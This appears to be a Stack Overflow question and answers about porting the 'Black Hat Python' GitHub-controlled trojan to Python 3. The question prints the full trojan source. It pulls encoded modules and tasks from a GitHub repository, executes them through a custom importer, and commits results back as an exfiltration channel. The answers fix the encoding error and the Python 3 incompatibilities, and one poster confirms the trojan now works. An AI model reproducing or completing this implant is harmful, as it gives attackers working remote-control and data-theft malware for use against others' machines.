# Traceback Error: Lookup Error: unknown encoding charmap

Tags: python-3.x, encoding, traceback

I am following along with Justin Seitz book "Black Hat Python." For this chapter we are writing a Trojan using GitHub for a command and control and using github3.py to interact with GitHub.  The problem is the book uses python2 and I am trying to do it in python3. I am getting the traceback error, "Lookup Error: unknown encoding: charmap". How can I fix this error?

Here is the traceback:

```
Traceback (most recent call last):
  File "trojan.py", line 102, in <module>
    config = get_trojan_config()
  File "trojan.py", line 44, in get_trojan_config
    config_json = get_file_contents(trojan_config)
  File "trojan.py", line 30, in get_file_contents
    gh, repo, branch = connect_to_github()
  File "trojan.py", line 24, in connect_to_github
    repo = gh.repository("*redacted*", "*redacted*")
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/github3/github.py", line 1063, in repository
    json = self._json(self._get(url), 200)
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/github3/models.py", line 130, in _get
    return self._session.get(url, **kwargs)
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/requests/sessions.py", line 521, in get
    return self.request('GET', url, **kwargs)
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/github3/session.py", line 81, in request
    response = super(GitHubSession, self).request(*args, **kwargs)
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/requests/sessions.py", line 508, in request
    resp = self.send(prep, **send_kwargs)
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/requests/sessions.py", line 618, in send
    r = adapter.send(request, **kwargs)
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/requests/adapters.py", line 440, in send
    timeout=timeout
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/urllib3/connectionpool.py", line 601, in urlopen
    chunked=chunked)
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/urllib3/connectionpool.py", line 346, in _make_request
    self._validate_conn(conn)
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/urllib3/connectionpool.py", line 850, in _validate_conn
    conn.connect()
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/urllib3/connection.py", line 337, in connect
    cert = self.sock.getpeercert()
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/urllib3/contrib/pyopenssl.py", line 346, in getpeercert
    (('commonName', x509.get_subject().CN),),
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/OpenSSL/crypto.py", line 540, in __getattr__
    nid = _lib.OBJ_txt2nid(_byte_string(name))
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/OpenSSL/_util.py", line 112, in byte_string
    return s.encode("charmap")
LookupError: unknown encoding: charmap
```

Here is the source code:

```
import json
import base64
import sys
import time
import importlib
import random
import threading
import queue
import os

from github3 import login

trojan_id = "abc"

trojan_config = "%s.json" % trojan_id
data_path = "data/%s/" % trojan_id
trojan_modules = []
configured = False
task_queue = queue.Queue()


def connect_to_github():
    gh = login(username="", password="")
    repo = gh.repository("", "")
    branch = repo.branch("master")
    return gh, repo, branch


def get_file_contents(filepath):
    gh, repo, branch = connect_to_github()
    tree = branch.commit.commit.tree.recurse()

    for filename in tree.tree:
        if filepath in filename.path:
            print("[*] Found file %s", filepath)
            blob = repo.blob(filename._json_data['sha'])
            return blob.content

    return None


def get_trojan_config():
    global configured
    config_json = get_file_contents(trojan_config)
    config = json.load(base64.b64decode(config_json))
    configured = True

    for task in config:
        if task['module'] not in sys.modules:
            exec("import %s" % task['module'])
    return config


def store_module_result(data):
    gh, repo, branch = connect_to_github()
    remote_path = "data/%s/%d.data" % (trojan_id, random.randint(1000, 100000))
    repo.create_file(remote_path, "Commit  message", base64.b64encode(data))

    return


class GitImporter(object):


    def __init__(self):
        self.current_module_code = ""


    def find_module(self, fullname, path=None):
        if configured:
            print("[*] Attempting to retrieve %s" % fullname)
            new_library = get_file_contents("modules/%s" % fullname)

            if new_library is not None:
                self.current_module_code = base64.b64decode(new_library)
                return self
        return None


    def load_module(self, name):
        module = importlib.import_module(name)
        exec(self.current_module_code in module.__dict__)
        sys.modules[name] = module

        return module


def module_runner(module):
    task_queue.put(1)
    result = sys.modules[module].run()
    task_queue.get()

    store_module_result(result)

    return


sys.meta_path =[GitImporter()]

while True:
    if task_queue.empty():
        config = get_trojan_config()
        for task in config:
            t = threading.Thread(target=module_runner, args = (task['module'],))
            t.start()
            time.sleep(random.randint(1, 10))
```

For the sake of privacy I have purposely redacted personally identifiable information from the source code and traceback.

Answer (score 2):

For this problem, you can edit the file:

> /Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/OpenSSL/_util.py

change the line that cause the error into：

```
return s.encode()
```

Answer (score 1):

To get the example from blackhat python to run in python you must make the following changes:

In the function `get_file_contents`, replace:

`tree = branch.commit.commit.tree.recurse()`

with:

`tree = branch.commit.commit.tree.to_tree().recurse()`

In the function `store_module_result`, replace:

`repo.create_file(remote_path, "Commit  message", base64.b64encode(data))`

with:

`repo.create_file(remote_path, "Commit  message", base64.b64encode(data.encode()))`

In the method `load_module`, replace:

`exec(self.current_module_code in module.__dict__)`

with:

`exec(self.current_module_code, module.__dict__)`

replace:

`import Queue`

with:

`import queue`

Comment: Welcome to SO. Your answer will be more useful to a greater number of users if you explain why your suggested changes answer the question.

Answer (score 1):

Thanks for the above help. In summary, three steps to fixed the error:

1) modify /Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/OpenSSL/_util.py, remove "charmap"

2) change to tree = branch.commit.commit.tree.to_tree().recurse()

3) exec(self.current_module_code, module.**dict**)

working now.thanks.